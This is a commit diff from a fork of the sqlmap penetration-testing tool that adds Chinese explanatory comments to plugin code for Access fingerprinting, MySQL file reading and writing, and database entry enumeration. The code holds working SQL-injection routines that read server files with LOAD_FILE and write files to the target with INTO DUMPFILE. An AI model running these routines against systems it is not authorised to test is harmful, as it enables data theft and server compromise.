ptnqoxywl
/
sqlmap
1
0
Fork 1
Code Issues Pull Requests 1 Packages Projects Releases Wiki Activity

Merge pull request '王生晖' (#19) from wangshenghui_new_branch into main

Browse Source
main
ptnqoxywl 3 months ago
parent 5db906c518 2ccc7bac72
commit 7fe117718c
9 changed files with 2303 additions and 1557 deletions
Show Stats Download Patch File Download Diff File

126
src/sqlmap-master/plugins/dbms/access/fingerprint.py
Unescape View File

@ -7,94 +7,109 @@ See the file 'LICENSE' for copying permission
import re import re
from lib.core.common import Backend # 1. 从库中引入需要的模块和类
from lib.core.common import Format from lib.core.common import Backend # 后端数据库信息
from lib.core.common import getCurrentThreadData from lib.core.common import Format # 格式化输出
from lib.core.common import randomStr from lib.core.common import getCurrentThreadData # 获取当前线程的数据
from lib.core.common import wasLastResponseDBMSError from lib.core.common import randomStr # 生成随机字符串
from lib.core.data import conf from lib.core.common import wasLastResponseDBMSError # 判断最后响应是否包含数据库错误
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 日志记录器
from lib.core.session import setDbms from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.settings import ACCESS_ALIASES from lib.core.session import setDbms # 设置当前数据库类型
from lib.core.settings import METADB_SUFFIX from lib.core.settings import ACCESS_ALIASES # ACCESS 数据库的别名
from lib.request import inject from lib.core.settings import METADB_SUFFIX # 元数据表后缀
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.ACCESS) GenericFingerprint.__init__(self, DBMS.ACCESS)
# 4. 私有方法,检查是否在沙盒中运行
def _sandBoxCheck(self): def _sandBoxCheck(self):
# Reference: http://milw0rm.com/papers/198 # 参考链接: http://milw0rm.com/papers/198
retVal = None retVal = None
table = None table = None
# 5. 根据 Access 版本设置需要查询的表名
if Backend.isVersionWithin(("97", "2000")): if Backend.isVersionWithin(("97", "2000")):
table = "MSysAccessObjects" table = "MSysAccessObjects"
elif Backend.isVersionWithin(("2002-2003", "2007")): elif Backend.isVersionWithin(("2002-2003", "2007")):
table = "MSysAccessStorage" table = "MSysAccessStorage"
# 6. 如果有对应的表名,则执行查询判断是否处于沙盒环境
if table is not None: if table is not None:
result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table) result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table)
retVal = "not sandboxed" if result else "sandboxed" retVal = "not sandboxed" if result else "sandboxed"
# 7. 返回检测结果
return retVal return retVal
# 8. 私有方法,检查系统表是否存在
def _sysTablesCheck(self): def _sysTablesCheck(self):
infoMsg = "executing system table(s) existence fingerprint" infoMsg = "executing system table(s) existence fingerprint"
logger.info(infoMsg) logger.info(infoMsg)
# Microsoft Access table reference updated on 01/2010 # 9. 定义不同版本 Access 需要检查的系统表
sysTables = { sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"), "97": ("MSysModules2", "MSysAccessObjects"),
"2000": ("!MSysModules2", "MSysAccessObjects"), "2000": ("!MSysModules2", "MSysAccessObjects"),
"2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"), "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
} }
# MSysAccessXML 是不稳定的系统表,因为它并非总是存在
# MSysAccessXML is not a reliable system table because it doesn't always exist # 10. 遍历系统表,进行检查
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")
for version, tables in sysTables.items(): for version, tables in sysTables.items():
exist = True exist = True
for table in tables: for table in tables:
negate = False negate = False
# 11. 如果表名以 ! 开头,表示该表应该不存在
if table[0] == '!': if table[0] == '!':
negate = True negate = True
table = table[1:] table = table[1:]
# 12. 执行 SQL 查询,检查表是否存在
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table) result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table)
if result is None: if result is None:
result = False result = False
# 13. 如果表不应该存在,则取反
if negate: if negate:
result = not result result = not result
# 14. 对所有表的结果进行与运算,只有都满足才能认为当前版本匹配
exist &= result exist &= result
if not exist: if not exist:
break break
# 15. 如果当前版本匹配,则返回版本号
if exist: if exist:
return version return version
# 16. 如果所有版本都不匹配,则返回 None
return None return None
# 17. 私有方法,获取数据库所在目录
def _getDatabaseDir(self): def _getDatabaseDir(self):
retVal = None retVal = None
infoMsg = "searching for database directory" infoMsg = "searching for database directory"
logger.info(infoMsg) logger.info(infoMsg)
# 18. 生成随机字符串
randStr = randomStr() randStr = randomStr()
# 19. 执行 SQL 查询,尝试触发错误,获取数据库目录
inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr))
# 20. 如果最后响应包含数据库错误
if wasLastResponseDBMSError(): if wasLastResponseDBMSError():
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
# 21. 从错误信息中提取数据库目录
match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1])
if match: if match:
@ -102,92 +117,115 @@ class Fingerprint(GenericFingerprint):
if retVal.endswith('\\'): if retVal.endswith('\\'):
retVal = retVal[:-1] retVal = retVal[:-1]
# 22. 返回数据库目录
return retVal return retVal
# 23. 获取指纹信息
def getFingerprint(self): def getFingerprint(self):
value = "" value = ""
# 24. 获取 Web 服务器操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp)
# 25. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp
# 26. 如果有数据库 Banner 信息
if kb.data.banner: if kb.data.banner:
# 27. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 28. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp
value += "back-end DBMS: " value += "back-end DBMS: "
# 29. 如果不是详细指纹,则返回数据库类型
if not conf.extensiveFp: if not conf.extensiveFp:
value += DBMS.ACCESS value += DBMS.ACCESS
return value return value
# 30. 获取活动的指纹信息
actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck()) actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck())
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
# 31. 如果有 Banner 解析指纹
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion")
# 32. 如果有 Banner 版本号
if banVer: if banVer:
# 33. 如果 Banner 信息包含 -log则表示启用日志
if re.search(r"-log$", kb.data.banner or ""): if re.search(r"-log$", kb.data.banner or ""):
banVer += ", logging enabled" banVer += ", logging enabled"
# 34. 格式化 Banner 版本号
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 35. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes()
# 36. 将 HTML 错误指纹添加到输出
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\ndatabase directory: '%s'" % self._getDatabaseDir() # 37. 获取数据库目录并添加到输出
value += "\
database directory: '%s'" % self._getDatabaseDir()
# 38. 返回完整的指纹信息
return value return value
# 39. 检查数据库类型是否为 Access
def checkDbms(self): def checkDbms(self):
# 40. 如果不是详细指纹,且当前数据库类型属于 Access 别名,则设置数据库类型为 Access 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES):
setDbms(DBMS.ACCESS) setDbms(DBMS.ACCESS)
return True return True
# 41. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.ACCESS infoMsg = "testing %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
# 42. 执行 SQL 查询,检查数据库类型是否为 Access
result = inject.checkBooleanExpression("VAL(CVAR(1))=1") result = inject.checkBooleanExpression("VAL(CVAR(1))=1")
# 43. 如果查询成功
if result: if result:
infoMsg = "confirming %s" % DBMS.ACCESS infoMsg = "confirming %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
# 44. 执行 SQL 查询,再次确认数据库类型是否为 Access
result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
# 45. 如果再次确认失败,则输出警告信息,并返回 False
if not result: if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 46. 设置数据库类型为 Access
setDbms(DBMS.ACCESS) setDbms(DBMS.ACCESS)
# 47. 如果不是详细指纹,则返回 True
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
# 48. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.ACCESS infoMsg = "actively fingerprinting %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
# 49. 执行系统表检查,获取 Access 版本
version = self._sysTablesCheck() version = self._sysTablesCheck()
# 50. 如果获取到版本信息,则设置数据库版本
if version is not None: if version is not None:
Backend.setVersion(version) Backend.setVersion(version)
# 51. 返回 True
return True return True
# 52. 如果第一次查询失败,则输出警告信息,并返回 False
else: else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 53. 强制枚举数据库类型
def forceDbmsEnum(self): def forceDbmsEnum(self):
conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_') # 54. 设置数据库名称
conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_')

122
src/sqlmap-master/plugins/dbms/mysql/filesystem.py
Unescape View File

@ -5,96 +5,118 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.agent import agent # 1. 从库中导入需要的模块
from lib.core.common import getSQLSnippet from lib.core.agent import agent # SQL 注入执行代理
from lib.core.common import isNumPosStrValue from lib.core.common import getSQLSnippet # 获取 SQL 代码片段
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 检查值是否为正数
from lib.core.common import popValue from lib.core.common import isTechniqueAvailable # 判断某注入方法是否可用
from lib.core.common import pushValue from lib.core.common import popValue # 弹出栈值
from lib.core.common import randomStr from lib.core.common import pushValue # 压入栈值
from lib.core.common import singleTimeWarnMessage from lib.core.common import randomStr # 生成随机字符串
from lib.core.compat import xrange from lib.core.common import singleTimeWarnMessage # 输出只显示一次的警告
from lib.core.data import conf from lib.core.compat import xrange # 兼容的 range 函数
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.decorators import stackedmethod from lib.core.data import logger # 日志记录器
from lib.core.enums import CHARSET_TYPE from lib.core.decorators import stackedmethod # 堆叠方法装饰器
from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE # 字符集类型
from lib.core.enums import EXPECTED from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 期望类型
from lib.core.enums import PLACE from lib.core.enums import PAYLOAD # payload 类型
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PLACE # 注入位置
from lib.request import inject from lib.core.exception import SqlmapNoneDataException # 无数据异常
from lib.request.connect import Connect as Request from lib.request import inject # 注入相关函数
from lib.techniques.union.use import unionUse from lib.request.connect import Connect as Request # 连接请求
from plugins.generic.filesystem import Filesystem as GenericFilesystem from lib.techniques.union.use import unionUse # UNION 注入方法
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统操作类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
# 3. 非堆叠读取文件的方法
def nonStackedReadFile(self, rFile): def nonStackedReadFile(self, rFile):
# 4. 如果不是暴力模式,则输出读取文件信息
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % rFile infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg) logger.info(infoMsg)
# 5. 执行SQL注入读取文件内容并以十六进制返回
result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
# 6. 返回读取结果
return result return result
# 7. 堆叠读取文件的方法
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
# 8. 如果不是暴力模式,则输出读取文件信息
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
# 9. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "longtext") self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
# 10. 获取远程临时目录
self.getRemoteTempPath() self.getRemoteTempPath()
# 11. 构建临时文件名
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
# 12. 输出调试信息
debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile
debugMsg += "into temporary file '%s'" % tmpFile debugMsg += "into temporary file '%s'" % tmpFile
logger.debug(debugMsg) logger.debug(debugMsg)
# 13. 通过堆叠查询,将文件内容以十六进制形式保存到临时文件
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile)) inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))
# 14. 输出调试信息
debugMsg = "loading the content of hexadecimal encoded file " debugMsg = "loading the content of hexadecimal encoded file "
debugMsg += "'%s' into support table" % remoteFile debugMsg += "'%s' into support table" % remoteFile
logger.debug(debugMsg) logger.debug(debugMsg)
# 15. 通过堆叠查询,将临时文件内容导入到支持表中
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
# 16. 从支持表中获取文件内容的长度
length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 17. 如果获取到的文件长度不合法
if not isNumPosStrValue(length): if not isNumPosStrValue(length):
warnMsg = "unable to retrieve the content of the " warnMsg = "unable to retrieve the content of the "
warnMsg += "file '%s'" % remoteFile warnMsg += "file '%s'" % remoteFile
# 18. 如果是直接模式或可以使用UNION注入
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
if not kb.bruteMode: if not kb.bruteMode:
warnMsg += ", going to fall-back to simpler UNION technique" warnMsg += ", going to fall-back to simpler UNION technique"
logger.warning(warnMsg) logger.warning(warnMsg)
# 19. 使用非堆叠方法读取文件
result = self.nonStackedReadFile(remoteFile) result = self.nonStackedReadFile(remoteFile)
else: else:
# 20. 如果没有可用的方法,则抛出异常
raise SqlmapNoneDataException(warnMsg) raise SqlmapNoneDataException(warnMsg)
else: else:
# 21. 将获取到的文件长度转为整数
length = int(length) length = int(length)
chunkSize = 1024 chunkSize = 1024
# 22. 如果文件长度大于 chunkSize
if length > chunkSize: if length > chunkSize:
result = [] result = []
# 23. 循环读取文件内容
for i in xrange(1, length, chunkSize): for i in xrange(1, length, chunkSize):
chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk) result.append(chunk)
else: else:
# 24. 直接读取文件内容
result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
# 25. 返回文件内容
return result return result
# 26. 使用 UNION 注入写入文件的方法
@stackedmethod @stackedmethod
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
# 27. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0] fcEncodedStr = fcEncodedList[0]
fcEncodedStrLen = len(fcEncodedStr) fcEncodedStrLen = len(fcEncodedStr)
# 28. 如果在 GET 请求中且编码后的长度大于 8000则输出警告信息
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "as the injection is on a GET parameter and the file " warnMsg = "as the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
@ -102,28 +124,36 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process" warnMsg += "writing process"
logger.warning(warnMsg) logger.warning(warnMsg)
# 29. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 30. 强制使用负数 where 条件
pushValue(kb.forceWhere) pushValue(kb.forceWhere)
kb.forceWhere = PAYLOAD.WHERE.NEGATIVE kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
# 31. 构建 SQL 查询语句
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile) sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)
# 32. 执行 SQL 查询
unionUse(sqlQuery, unpack=False) unionUse(sqlQuery, unpack=False)
kb.forceWhere = popValue() kb.forceWhere = popValue()
# 33. 输出警告信息,提示文件可能包含垃圾字符
warnMsg = "expect junk characters inside the " warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from UNION query" warnMsg += "file as a leftover from UNION query"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
# 34. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 35. 使用 LINES TERMINATED 写入文件的方法
def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
# 36. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0][2:] fcEncodedStr = fcEncodedList[0][2:]
fcEncodedStrLen = len(fcEncodedStr) fcEncodedStrLen = len(fcEncodedStr)
# 37. 如果在 GET 请求中且编码后的长度大于 8000则输出警告信息
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file " warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
@ -131,47 +161,59 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process" warnMsg += "writing process"
logger.warning(warnMsg) logger.warning(warnMsg)
# 38. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 39. 获取 SQL 代码片段
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr) query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)
# 40. 添加 SQL 前缀
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
# 41. 生成 payload
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
# 42. 执行 SQL 查询
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
# 43. 输出警告信息,提示文件可能包含垃圾字符
warnMsg = "expect junk characters inside the " warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from original query" warnMsg += "file as a leftover from original query"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
# 44. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 45. 使用堆叠查询写入文件的方法
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 46. 输出调试信息
debugMsg = "creating a support table to write the hexadecimal " debugMsg = "creating a support table to write the hexadecimal "
debugMsg += "encoded file to" debugMsg += "encoded file to"
logger.debug(debugMsg) logger.debug(debugMsg)
# 47. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "longblob") self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
# 48. 输出调试信息
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
# 49. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", False) fcEncodedList = self.fileEncode(localFile, "hex", False)
# 50. 输出调试信息
debugMsg = "forging SQL statements to write the hexadecimal " debugMsg = "forging SQL statements to write the hexadecimal "
debugMsg += "encoded file to the support table" debugMsg += "encoded file to the support table"
logger.debug(debugMsg) logger.debug(debugMsg)
# 51. 将文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList) sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 52. 输出调试信息
logger.debug("inserting the hexadecimal encoded file to the support table") logger.debug("inserting the hexadecimal encoded file to the support table")
# 53. 设置最大允许的数据包大小
inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)
# 54. 循环执行 SQL 查询语句
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)
# 55. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 56. 使用 DUMPFILE 将数据导出到远程文件
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True) inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) # 57. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

1411
src/sqlmap-master/plugins/generic/databases.py
View File

File diff suppressed because it is too large Load Diff

239
src/sqlmap-master/plugins/generic/entries.py
Unescape View File

@ -5,10 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
# 导入正则表达式模块
import re import re
# 从lib.core.agent模块导入agent对象用于处理注入过程中的各种细节
from lib.core.agent import agent from lib.core.agent import agent
# 从lib.core.bigarray模块导入BigArray类用于高效存储和处理大量数据
from lib.core.bigarray import BigArray from lib.core.bigarray import BigArray
# 从lib.core.common模块导入各种常用函数和常量如Backend、clearConsoleLine、getLimitRange等
from lib.core.common import Backend from lib.core.common import Backend
from lib.core.common import clearConsoleLine from lib.core.common import clearConsoleLine
from lib.core.common import getLimitRange from lib.core.common import getLimitRange
@ -25,33 +29,47 @@ from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage from lib.core.common import singleTimeWarnMessage
from lib.core.common import unArrayizeValue from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming
# 从lib.core.convert模块导入getConsoleLength函数用于获取控制台字符串的长度
from lib.core.convert import getConsoleLength from lib.core.convert import getConsoleLength
from lib.core.convert import getUnicode from lib.core.convert import getUnicode
# 从lib.core.data模块导入conf和kb对象用于存储配置信息和知识库信息
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
# 从lib.core.data模块导入logger对象用于记录日志信息
from lib.core.data import logger from lib.core.data import logger
# 从lib.core.data模块导入queries对象用于存储各种数据库的查询语句
from lib.core.data import queries from lib.core.data import queries
# 从lib.core.dicts模块导入DUMP_REPLACEMENTS字典用于替换转储数据中的特殊字符
from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.dicts import DUMP_REPLACEMENTS
# 从lib.core.enums模块导入各种枚举类型如CHARSET_TYPE、DBMS、EXPECTED、PAYLOAD等
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
# 从lib.core.exception模块导入各种自定义异常类
from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
# 从lib.core.settings模块导入各种配置常量
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX from lib.core.settings import METADB_SUFFIX
from lib.core.settings import NULL from lib.core.settings import NULL
from lib.core.settings import PLUS_ONE_DBMSES from lib.core.settings import PLUS_ONE_DBMSES
from lib.core.settings import UPPER_CASE_DBMSES from lib.core.settings import UPPER_CASE_DBMSES
# 从lib.request模块导入inject函数用于执行SQL注入
from lib.request import inject from lib.request import inject
# 从lib.utils.hash模块导入attackDumpedTable函数用于对转储的表数据进行攻击
from lib.utils.hash import attackDumpedTable from lib.utils.hash import attackDumpedTable
# 从lib.utils.pivotdumptable模块导入pivotDumpTable函数用于执行透视转储表操作
from lib.utils.pivotdumptable import pivotDumpTable from lib.utils.pivotdumptable import pivotDumpTable
# 导入第三方six库用于兼容Python 2和Python 3
from thirdparty import six from thirdparty import six
# 导入第三方six库的zip函数并重命名为_zip
from thirdparty.six.moves import zip as _zip from thirdparty.six.moves import zip as _zip
# 定义Entries类用于封装枚举数据库条目的相关功能
class Entries(object): class Entries(object):
""" """
